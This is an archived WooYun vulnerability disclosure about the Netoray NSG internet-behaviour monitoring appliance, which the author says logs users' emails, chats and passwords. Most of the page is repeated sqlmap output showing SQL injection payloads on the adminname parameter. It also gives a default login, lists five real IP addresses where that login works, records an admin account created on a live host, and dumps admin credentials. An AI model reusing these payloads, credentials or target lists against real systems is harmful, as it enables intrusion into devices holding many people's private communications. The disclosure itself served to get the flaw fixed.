乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-19: 细节已通知厂商并且等待厂商处理中 2015-03-24: 厂商已经确认,细节仅向厂商公开 2015-03-27: 细节向第三方安全合作伙伴开放 2015-05-18: 细节向核心白帽子及相关领域专家公开 2015-05-28: 细节向普通白帽子公开 2015-06-07: 细节向实习白帽子公开 2015-06-22: 细节向公众公开
不得不卧槽这个“上网行为管理系统”居然能记录各个品牌邮箱收发邮件记录内容,QQ聊天详细记录,飞信记录,微博记录,ftp记录,telnet记录和所有所有网页登录账号密码记录等等信息都会记录得一清二楚的(异常强大),而且很多高校使用,请问学生的隐私去哪了?使用这款路由上网“完全没有任何隐私可言”。。
Netoray NSG 上网行为管理系统,存在默认口令:superadmin/123456通过默认口令登录发现存在注入,而且是dba权限。而且这个路由功能异常强大,凡是通过这个路由上网的设备都会把你上网的内容记录得一清二楚。(同时发现案例存在一所高校,用户连接数12000+以上,学生所有网上行为一清二楚。。)
默认口令案例:https://121.250.28.125/https://221.123.130.107/https://60.30.2.74/https://119.2.27.73/https://117.36.195.144/
https://121.250.28.125/cgi-bin/system_management/usap_admin.cgi?cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=465410561&lang=zh_CN.UTF-8
sqlmap identified the following injection points with a total of 1308 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11current database: 'NTC'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11current user is DBA: Truesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11Database: NTC[136 tables]+----------------------------+| nedata_ipmacbind_record || newurl || t_data_mail || t_data_mobileapp || t_data_netphone || t_data_nettv || t_data_ongame || t_data_operation || t_data_p2p || t_data_payinfo || t_data_policyroute || t_data_priviledge || t_data_proxy || t_data_qq_pwd || t_data_qq_sn || t_data_rdp || t_data_retrresult || t_data_sip || t_data_smb || t_data_ssh || t_data_ssl || t_data_stock || t_data_telnet || t_data_telnetcmd || t_data_transfile || t_data_unknowurl || t_rep_alertlog || t_rep_app || t_rep_dataindex || t_rep_flow || t_rep_get || t_rep_im || t_rep_index || t_rep_mail || t_rep_post || t_rep_session || t_rep_time || t_sys_aclpolicy || t_sys_admin || t_sys_admingroup || t_sys_admingrouprolemap || t_sys_adminrolemap || t_sys_alertlog || t_sys_app || t_sys_appbwlist || t_sys_appgroup || t_sys_billingip || t_sys_billinglog || t_sys_billingpolicy || t_sys_billinguser || t_sys_bwdevice || t_sys_bwginfo || t_sys_bwglist || t_sys_bwip || t_sys_bwpolicychannel || t_sys_bwpolicyvalue || t_sys_bwtraffic || t_sys_bypass || t_sys_cltdeviceobj || t_sys_cltfileobj || t_sys_cltosobj || t_sys_cltpolicycontent || t_sys_cltpolicymain || t_sys_cltpolicyuser || t_sys_cltportobj || t_sys_cltprocobj || t_sys_cltregobj || t_sys_clttime || t_sys_cntuser || t_sys_command_transit || t_sys_customreport || t_sys_customsubnet || t_sys_datasync || t_sys_dumptable || t_sys_filefeature || t_sys_functions || t_sys_help || t_sys_httptype || t_sys_ignoresuffix || t_sys_keylib || t_sys_keyword || t_sys_killexecute || t_sys_l3switch || t_sys_localip || t_sys_managelog || t_sys_mobileuser_log || t_sys_modules || t_sys_monif || t_sys_netcapture || t_sys_ntpserver || t_sys_pages || t_sys_parameter || t_sys_queryinfo || t_sys_resources || t_sys_retrtask || t_sys_role || t_sys_roleusergroupmap || t_sys_roleusermap || t_sys_rule || t_sys_ruleactdef || t_sys_ruleipobj || t_sys_ruleopconf || t_sys_ruleopdef || t_sys_ruleoptdef || t_sys_rulewarndef || t_sys_snmp || t_sys_snmp_trap || t_sys_subnetgroup || t_sys_timepolicy || t_sys_timepolicyscope || t_sys_uplink_default_param || t_sys_uplink_dev_list || t_sys_uplink_local || t_sys_uplink_upload_index || t_sys_uplink_upload_work || t_sys_uplink_vector || t_sys_uplinkversion || t_sys_urlbwlist || t_sys_urlclass || t_sys_urllib || t_sys_user || t_sys_user_bwlist || t_sys_user_macbwlist || t_sys_usergroup || t_sys_useronline || t_sys_useronline_history || t_sys_useronlinelog || t_sys_versionlog || t_sys_warnmail || t_sys_warnpage || t_sys_webmail || v_sys_adminvalidroles || v_sys_adminvalidusergroups || v_sys_adminvalidusers || v_sys_rolevalidusergroups || v_sys_rolevalidusers |+----------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11Database: NTCTable: t_sys_user[33 columns]+--------------+------------------+| Column | Type |+--------------+------------------+| check_valid | int(11) || circle_check | int(11) || create_time | datetime || creator | varchar(64) || eip | int(10) unsigned || end_time | datetime || false_times | int(11) || fee | float || free_audit | int(11) || gid | int(32) unsigned || invalid_date | int(11) || invalid_time | datetime || invalid_unit | int(11) || key_user | int(11) || ldap_name | varchar(64) || lock_time | int(11) || login_time | datetime || mac | varchar(32) || name | varchar(64) || permit_times | int(11) || pwd | varchar(64) || real_name | varchar(64) || settle_type | int(11) || share_number | int(11) || sip | int(10) unsigned || start_time | datetime || status | char(1) || tel | char(32) || uid | int(32) unsigned || unlock_time | datetime || valid_date | int(11) || valid_time | datetime || valid_unit | int(11) |+--------------+------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11Database: NTCTable: t_sys_user[0 entries]+----------+-----+| key_user | pwd |+----------+-----++----------+-----+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11Database: NTCTable: t_sys_user[0 entries]+----------+-----+------+| key_user | pwd | name |+----------+-----+------++----------+-----+------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11Database: NTCTable: t_sys_user[33 columns]+--------------+------------------+| Column | Type |+--------------+------------------+| check_valid | int(11) || circle_check | int(11) || create_time | datetime || creator | varchar(64) || eip | int(10) unsigned || end_time | datetime || false_times | int(11) || fee | float || free_audit | int(11) || gid | int(32) unsigned || invalid_date | int(11) || invalid_time | datetime || invalid_unit | int(11) || key_user | int(11) || ldap_name | varchar(64) || lock_time | int(11) || login_time | datetime || mac | varchar(32) || name | varchar(64) || permit_times | int(11) || pwd | varchar(64) || real_name | varchar(64) || settle_type | int(11) || share_number | int(11) || sip | int(10) unsigned || start_time | datetime || status | char(1) || tel | char(32) || uid | int(32) unsigned || unlock_time | datetime || valid_date | int(11) || valid_time | datetime || valid_unit | int(11) |+--------------+------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11Database: NTC[136 tables]+----------------------------+| nedata_ipmacbind_record || newurl || t_data_mail || t_data_mobileapp || t_data_netphone || t_data_nettv || t_data_ongame || t_data_operation || t_data_p2p || t_data_payinfo || t_data_policyroute || t_data_priviledge || t_data_proxy || t_data_qq_pwd || t_data_qq_sn || t_data_rdp || t_data_retrresult || t_data_sip || t_data_smb || t_data_ssh || t_data_ssl || t_data_stock || t_data_telnet || t_data_telnetcmd || t_data_transfile || t_data_unknowurl || t_rep_alertlog || t_rep_app || t_rep_dataindex || t_rep_flow || t_rep_get || t_rep_im || t_rep_index || t_rep_mail || t_rep_post || t_rep_session || t_rep_time || t_sys_aclpolicy || t_sys_admin || t_sys_admingroup || t_sys_admingrouprolemap || t_sys_adminrolemap || t_sys_alertlog || t_sys_app || t_sys_appbwlist || t_sys_appgroup || t_sys_billingip || t_sys_billinglog || t_sys_billingpolicy || t_sys_billinguser || t_sys_bwdevice || t_sys_bwginfo || t_sys_bwglist || t_sys_bwip || t_sys_bwpolicychannel || t_sys_bwpolicyvalue || t_sys_bwtraffic || t_sys_bypass || t_sys_cltdeviceobj || t_sys_cltfileobj || t_sys_cltosobj || t_sys_cltpolicycontent || t_sys_cltpolicymain || t_sys_cltpolicyuser || t_sys_cltportobj || t_sys_cltprocobj || t_sys_cltregobj || t_sys_clttime || t_sys_cntuser || t_sys_command_transit || t_sys_customreport || t_sys_customsubnet || t_sys_datasync || t_sys_dumptable || t_sys_filefeature || t_sys_functions || t_sys_help || t_sys_httptype || t_sys_ignoresuffix || t_sys_keylib || t_sys_keyword || t_sys_killexecute || t_sys_l3switch || t_sys_localip || t_sys_managelog || t_sys_mobileuser_log || t_sys_modules || t_sys_monif || t_sys_netcapture || t_sys_ntpserver || t_sys_pages || t_sys_parameter || t_sys_queryinfo || t_sys_resources || t_sys_retrtask || t_sys_role || t_sys_roleusergroupmap || t_sys_roleusermap || t_sys_rule || t_sys_ruleactdef || t_sys_ruleipobj || t_sys_ruleopconf || t_sys_ruleopdef || t_sys_ruleoptdef || t_sys_rulewarndef || t_sys_snmp || t_sys_snmp_trap || t_sys_subnetgroup || t_sys_timepolicy || t_sys_timepolicyscope || t_sys_uplink_default_param || t_sys_uplink_dev_list || t_sys_uplink_local || t_sys_uplink_upload_index || t_sys_uplink_upload_work || t_sys_uplink_vector || t_sys_uplinkversion || t_sys_urlbwlist || t_sys_urlclass || t_sys_urllib || t_sys_user || t_sys_user_bwlist || t_sys_user_macbwlist || t_sys_usergroup || t_sys_useronline || t_sys_useronline_history || t_sys_useronlinelog || t_sys_versionlog || t_sys_warnmail || t_sys_warnpage || t_sys_webmail || v_sys_adminvalidroles || v_sys_adminvalidusergroups || v_sys_adminvalidusers || v_sys_rolevalidusergroups || v_sys_rolevalidusers |+----------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11Database: NTCTable: t_sys_admin[17 columns]+---------------+---------------------+| Column | Type |+---------------+---------------------+| activated | char(1) || burst | int(32) unsigned || email | char(64) || endtime | datetime || ipaddr | varchar(16) || locked | tinyint(3) unsigned || lockedtime | datetime || logincount | tinyint(3) unsigned || macaddr | varchar(18) || maxlogincount | tinyint(3) unsigned || name | char(64) || password | varchar(16) || shortcut | varchar(256) || starttime | datetime || ugid | int(32) unsigned || uid | int(32) unsigned || unlocktime | int(32) unsigned |+---------------+---------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: adminname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8---back-end DBMS: MySQL 5.0.11Database: NTCTable: t_sys_admin[5 entries]+-----+------------+----------+| uid | name | password |+-----+------------+----------+| 1 | superadmin | 123456 || 2 | manager | 123456 || 3 | maintainer | 123456 || 80 | asdasd | 123456 || 81 | 0 | 123456 |+-----+------------+----------+
联系厂商
危害等级:高
漏洞Rank:18
确认时间:2015-03-24 08:56
CNVD确认并复现所述情况,由CNVD向软件生产厂商深圳莱克斯公司通报.
暂无